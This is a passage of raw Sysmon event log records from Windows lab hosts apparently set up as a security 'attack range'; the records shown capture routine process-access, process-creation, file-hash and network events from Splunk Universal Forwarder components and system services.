Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.673{4F8D34B0-16EB-6216-FD04-000000003902}3224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16EB-6216-FC04-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-16EB-6216-FC04-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.000{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-16EB-6216-FC04-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:47.001{4F8D34B0-16EB-6216-FC04-000000003902}644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220877Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:48.844{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CD9780ECEBF7F2565AE15ABD371230C,SHA256=307342089646C31606CE97C6677497615993136908324C8B02BCE1CF5CF461AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:48.822{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3CA10EC0FACCA2A39FFF78850E0FA0E,SHA256=27E0A0A9EAAE363B5271A9EE38B8C1CAEE6A73D627827FFECBF4702F86E0E270,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220876Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:45.935{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51612-false10.0.1.12-8089- 23542300x8000000000000000220875Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:48.016{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=976112F4F6EB0BA7DDFFE808C2237642,SHA256=A8161E77FE7B1EA2AF9297F749F44DA4225B0B531272F0DD0158891CA67A82E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:49.852{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B48D9548CB41D40405BBB672F68449E,SHA256=442F6ED6C42FA24A9068A876BCC797BFC7438AB7E5991EFAFF03A263DE3D5C09,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.859{4F8D34B0-16ED-6216-FF04-000000003902}172784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-16ED-6216-FF04-000000003902}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:49.672{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 